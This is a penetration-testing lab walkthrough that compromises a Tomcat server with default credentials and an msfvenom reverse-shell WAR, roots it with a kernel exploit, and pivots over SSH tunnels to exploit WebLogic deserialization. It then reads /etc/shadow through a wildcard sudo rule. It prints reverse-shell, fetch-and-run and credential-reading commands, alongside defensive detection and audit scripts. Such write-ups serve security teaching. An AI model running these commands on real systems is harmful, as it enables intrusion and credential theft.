PT Exercise

Lab:

Lab.PNG

Reconnaissance

Let’s start the fun by doing an nmap scan of our victim machine, 192.168.1.8.

NmapScan.png

We found multiple services running, including Apache, NetBIOS, an NFS share and Tomcat. Whenever I find Tomcat, I always think of the default Tomcat credentials and the WAR file upload exploit.

Exploit Scenario

First I tried to visit http://192.168.1.8:8080/manager and try the tomcat:tomcat credentials, and I could connect to the manager interface.

ConnectTo Manager.png

Next I created a WAR file payload using msfvenom to get a reverse shell that connects from the server back to my attacker machine 192.168.1.13 on port 4443, and named the file webshell.war:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.13 LPORT=4443 -f war > webshell.war

MSFVenomOut.png

Next we have to get the name of the JSP file to execute; we can list it with jar -tf webshell.war.

GetJSP.png

Next we have to listen on port 4443 and then execute

wget 192.168.1.8:8080/webshell/umrvzbycqupfmbi.jsp

or visit the URL from our browser, and we will get a shell on our first victim as the user tomcat7.

TomCatRCE.png
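Seen from the Tomcat server's side, the steps above leave a characteristic trail in the access log: a login to /manager/html, a deploy request, then the very first request to a context that did not exist before. The following detection script is an added example written for this page (not part of the original post); it runs over a constructed access log in Tomcat's default log pattern, and the attacker IP and JSP file name are the ones from the narrative.

```python
import re

# Default Tomcat access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Manager endpoints that deploy an application: the HTML upload form and the text API
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy)\b')

# Constructed sample log, not taken from the post; attacker IP and JSP name follow its narrative
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024
192.168.1.13 - tomcat [01/Jan/2020:10:01:11 +0000] "GET /manager/html HTTP/1.1" 200 14521
192.168.1.13 - tomcat [01/Jan/2020:10:02:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=NONCE HTTP/1.1" 200 15012
192.168.1.13 - - [01/Jan/2020:10:03:02 +0000] "GET /webshell/umrvzbycqupfmbi.jsp HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2020:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def context_of(path):
    """Top-level context of a request path, e.g. '/webshell' for '/webshell/x.jsp'."""
    parts = path.split("?", 1)[0].split("/")
    return "/" + (parts[1] if len(parts) > 1 else "")


def find_manager_deploys(lines, allowed_admins=frozenset()):
    """Flag manager deployments from hosts outside the admin allow-list, and the first
    request to a context that did not exist before a deployment (the uploaded WAR)."""
    alerts, known_contexts, deploy_seen = [], set(), False
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, user, method, path = m["ip"], m["user"], m["method"], m["path"]
        status = int(m["status"])
        if DEPLOY_RE.match(path):
            deploy_seen = True
            if ip not in allowed_admins:
                alerts.append(f"manager deploy from unexpected host {ip} as {user}: {method} {path} -> {status}")
            continue
        ctx = context_of(path)
        if deploy_seen and ctx not in known_contexts and status < 400:
            alerts.append(f"first request to new context {ctx} after a deploy: {ip} {method} {path}")
        known_contexts.add(ctx)
    return alerts


if __name__ == "__main__":
    for alert in find_manager_deploys(SAMPLE_LOG.splitlines()):
        print(alert)
```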

Privilege Escalation

Once I get a shell and want to do privilege escalation, I always check which commands I can execute as root with sudo.

sudo Command 1st Machine.png

Unfortunately I can’t execute any commands using sudo. Let’s check the kernel version using uname -v.

uname Version.png

Doing some Google-fu, you can find that this version is vulnerable to a privilege escalation exploit, so we can get the exploit from the internet: 39166.c.

First I have to get the exploit code onto the victim machine, so I ran a Python HTTP server using the command python -m SimpleHTTPServer, which listens on port 8000, and then ran wget from our reverse shell to fetch the code and put it inside /tmp.

GetExploitToTmp.png

Finally we compile the code and run the exploit, and voilà, we got a root shell.

ExecuteShell.png

Pivoting

First let’s run ifconfig to check if our victim is connected to another network.

ifconfig.png

We can see that it has another IP, 192.168.152.143. Now we have to find a way to use this machine as a pivot and connect to the other network. Reading an article about how Hacking got hacked, I remembered a technique to do this using SSH dynamic tunneling and proxychains.

So first I started the SSH daemon, as the nmap results showed no SSH running, and I also changed the root password in order to be able to establish an SSH session.

Starting SSH.png

Next I ran the command below, which creates what is called a dynamic tunnel using the -D option.

ssh -D 9090 root@192.168.1.8

SSH Dynamic Tunneling Command.png

Once the SSH session is started, the tunnel is up on port 9090, so next let’s configure proxychains to use this port.

ProxyChainsConf.png

Now we can prefix any command with proxychains when connecting to any IP in the 192.168.152.0/24 subnet.

Next we can run our nmap ping sweep through proxychains, so that proxychains uses the SSH tunnel created on port 9090 to reach the 192.168.152.0/24 subnet, by executing

sudo proxychains nmap -Pn 192.168.152.0/24

Ping Sweep.png

By excluding 192.168.152.1 and 192.167.152.254 (VM-specific IPs), we can conclude that our next victim will be 192.168.152.141.

Let’s nmap this host using proxychains.

Nmap using ProxyChains 2nd Machine.png

We found two ports open. First I wanted to browse to port 7001 using my browser; unfortunately proxychains can’t do that, so the solution was to create a local SSH tunnel to be able to connect to port 7001:

ssh -L 7000:192.168.152.141:7001 root@192.168.1.8

This means that we can connect to localhost on port 7000 and the traffic will be tunneled to our victim 192.168.152.141 on port 7001.

LocalTunnel2.png

Next, from the browser we can visit http://localhost:7000 and we find that it’s Oracle WebLogic.

BrowseWebLogic.png

WebLogic is an Oracle application middleware which is usually used to connect applications with each other using servlets and other techniques.

Doing some Google-fu we can find that it’s vulnerable to a Java deserialization exploit which can lead to RCE.

I found many topics on how to exploit Java deserialization vulnerabilities in Oracle WebLogic, including this one.

The only challenge was how to get a reverse shell from the other victim, 192.168.152.141, while it’s not in our network.

Again we can use SSH tunneling, but this time remote SSH tunneling.

We need a remote tunnel which will be used to connect back to our Linux Mint attacker machine 192.168.1.13 on port 4444.

So first we created our bash reverse shell script; the script below, when executed, will make a reverse shell connection to our first victim 192.168.152.143 on port 8888.

BashReverseCode.png

So we have to create a remote tunnel that forwards all requests to port 8888 on the first victim to port 4444 on our machine:

ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8

Once the SSH connection is established between the attacker machine and the first victim, this command creates a listener on the first victim on port 8888; any connection to this port will be forwarded to the attacker machine on port 4444.

TunnelToBashShell.png

But now how can we get this bash script onto the vulnerable WebLogic server? The solution is to host it on our Python SimpleHTTPServer on port 8000 and create another remote tunnel to my web server using

ssh -R 0.0.0.0:8001:192.168.1.13:8000 root@192.168.1.8

TunnelToGetBashShell Code.png
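All three tunnel types used above depend on the pivot host's sshd_config: password login as root requires PermitRootLogin yes, the -D/-L/-R forwards require AllowTcpForwarding, and an -R listener is only bound to 0.0.0.0 (so that hosts on the 192.168.152.0/24 side can reach port 8888) when GatewayPorts is yes or clientspecified, because sshd otherwise binds remote forwards to loopback. The following audit helper is an added example written for this page, not code from the post; the two sshd_config fragments are constructed, and Match blocks are deliberately not evaluated.

```python
# Values sshd uses when an option is absent from sshd_config (OpenSSH 7.0 and later).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
}

# Constructed sshd_config fragments (not from the post): one allowing the pivot as described, one hardened.
WEAK_CONFIG = """\
PermitRootLogin yes
AllowTcpForwarding yes
GatewayPorts yes
PermitRootLogin no   # ignored by sshd: the first occurrence of an option wins
"""
HARDENED_CONFIG = """\
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
Match User backup
    AllowTcpForwarding yes   # inside a Match block, which this simplified parser does not evaluate
"""


def effective_settings(config_text):
    """First occurrence of an option wins, as in sshd; parsing stops at the first Match block (simplification)."""
    settings, seen = dict(DEFAULTS), set()
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.replace("=", " ", 1).partition(" ")  # 'Key value' or 'Key=value'
        key = key.lower()
        if key == "match":
            break
        if key in settings and key not in seen:
            settings[key] = value.strip().lower()
            seen.add(key)
    return settings


def pivot_findings(settings):
    """Report the settings that make the SSH pivot described in the post possible."""
    findings = []
    if settings["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password")
    if settings["allowtcpforwarding"] != "no":
        findings.append("AllowTcpForwarding enabled: -D/-L/-R tunnels through this host are allowed")
    if settings["gatewayports"] != "no":
        findings.append("GatewayPorts enabled: -R listeners may bind 0.0.0.0 and be reached by other hosts")
    return findings
```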

So let’s now exploit the WebLogic Java deserialization vulnerability.

Let’s use the exploit code from this blog:

python weblogic.py [victim host and port] [location of the ysoserial tool, which generates Java payloads] [command to execute]

python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar 'wget http://192.168.152.143:8001/BashReverseShell.sh'

So connecting to 192.168.152.143:8001 will basically connect to our machine on port 8000, which is the Python HTTP web server.

WebLogicExploitGetBash Code.png

And in the Python web server logs we can see a GET request for the bash file, which means that our exploit is succeeding; the only thing missing is to execute the script.

WebServerLogs.png

So now let’s run the exploit code, which will make a reverse connection to 192.168.152.141:8888, which in turn will be tunneled to 192.168.1.13:4444 using the command

ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8

We also have to start our listener on port 4444.

Finally, when we execute

python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar 'sh BashReverseShell.sh'

we get ourselves a shell.

listner and shell.png

Misconfiguration to root

As always, when I get a shell I try to find which commands I can run as root using sudo.

Sudo 2nd Machine.png

I can see that I can run /bin/cat /root/backup/*.

Great, that is a misconfiguration which we can take advantage of. We can use sudo to cat a path under /root/backup, then go two directories back and basically cat any file we want as root.

So let’s cat the shadow file using

sudo /bin/cat /root/backup/../../etc/shadow

GetRootHash.png
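Why that rule is unsafe: sudoers compares command arguments with fnmatch(3) and without FNM_PATHNAME, so the '*' in /root/backup/* matches '/' and '..' (and even spans argument boundaries), and the argument is never canonicalised before the match. The following audit helper is an added example written for this page, not from the post; the rule is the one found on the second machine, while the hardened alternative and its file name daily.tar are constructed.

```python
import fnmatch
import posixpath
import shlex

WILDCARDS = set("*?[")

# The rule found on the second machine, and a constructed alternative that names the exact file.
WEAK_RULE = "/bin/cat /root/backup/*"
SAFER_RULE = "/bin/cat /root/backup/daily.tar"   # constructed file name


def rule_allows(rule_args, argv_args):
    """sudoers joins the requested arguments into one string and compares it with the
    rule's arguments using fnmatch(3) without FNM_PATHNAME: '*' also matches '/' and
    '..', spans argument boundaries, and the path is never canonicalised first."""
    return fnmatch.fnmatchcase(" ".join(argv_args), rule_args)


def files_read_via_rule(rule_spec, argv):
    """If argv is permitted by the Cmnd spec, return the canonical paths cat would open."""
    rule_cmd, _, rule_args = rule_spec.partition(" ")
    if argv[0] != rule_cmd or not rule_allows(rule_args, argv[1:]):
        return None
    return [posixpath.normpath(a) for a in argv[1:]]


def audit_cmnd_spec(spec):
    """Findings for a sudoers Cmnd spec whose absolute-path arguments contain wildcards."""
    cmd, *args = shlex.split(spec)
    findings = []
    for arg in args:
        present = WILDCARDS & set(arg)
        if not arg.startswith("/") or not present:
            continue
        prefix = arg[: min(arg.index(c) for c in present)]   # literal part before the first wildcard
        intended = posixpath.dirname(prefix) or "/"
        findings.append(f"{cmd} {arg}: wildcard in a path argument is not confined to "
                        f"{intended}; use an exact file name or a wrapper script instead")
    return findings


if __name__ == "__main__":
    print(audit_cmnd_spec(WEAK_RULE))
    print(files_read_via_rule(WEAK_RULE, ["/bin/cat", "/root/backup/../../etc/shadow"]))
    print(audit_cmnd_spec(SAFER_RULE))
```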

And finally I cracked the root password using John the Ripper; it was mario101.

Cracked.png

Thanks, hope you enjoyed reading.